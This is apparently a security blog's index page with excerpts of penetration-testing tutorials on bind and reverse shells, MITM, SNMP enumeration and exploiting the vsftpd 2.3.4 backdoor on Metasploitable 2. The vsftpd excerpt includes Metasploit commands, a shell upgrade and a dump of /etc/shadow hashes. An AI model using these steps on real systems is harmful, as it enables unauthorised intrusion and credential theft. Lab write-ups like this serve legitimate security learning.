Working With Bind and Reverse Shells

Bind shells are commonly used by penetration testers to logically set up a service port in a listening state on a targeted system while binding the listening service port to a native shell such as Bourne Again Shell (Bash) on Linux or Command Prompt on Windows; this is commonly referred to as a listener. Once the penetration tester initiates a connection to the listener and a session is established, the penetration tester will gain access to the targeted system’s native shell, whether it’s Bash on Linux or Command Prompt on a Windows-based system. ...

November 24, 2025 · 6 min · 1100 words · 0x-s0M3n4th

MITM Attacks

When connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext. ...

November 24, 2025 · 6 min · 1146 words · 0x-s0M3n4th

Identifying and Exploiting Vulnerable Services

Exploiting Linux-based systems:

1. Fire up Metasploitable 2 Linux.
2. Scan the target using nmap: nmap -A -p 21 172.30.1.134
   Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4.
3. Search Google for "vsftpd 2.3.4 exploit". There is an exploit module from Rapid7 itself.
4. Open up msfconsole: sudo msfconsole
5. Use the module and run it:
   msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
6. Upgrade the shell using the command python -c 'import pty; pty.spawn("/bin/bash")'
7. Got a root shell on the target system and dumped the /etc/shadow file, where the hashes of the users' passwords are stored.
8. Save the credentials into a text file, making sure to edit out the unnecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th

BGP Hijacking

COMING SOON

November 24, 2025 · 1 min · 2 words · 0x-s0M3n4th

SNMP Exploitation

1. Scan for the SNMP service using Nmap: nmap -sU -sT -p U:161,T:161 192.168.83.140
2. Open msfconsole and use the module named snmp_enum.
3. Then run it. It dumped all the network information: services running, open TCP and UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, and processes.

Using tools other than Metasploit:

1. Nmap: nmap -sU -p 161 --script snmp-brute 192.168.83.140
2. snmpset: ...

November 24, 2025 · 4 min · 809 words · 0x-s0M3n4th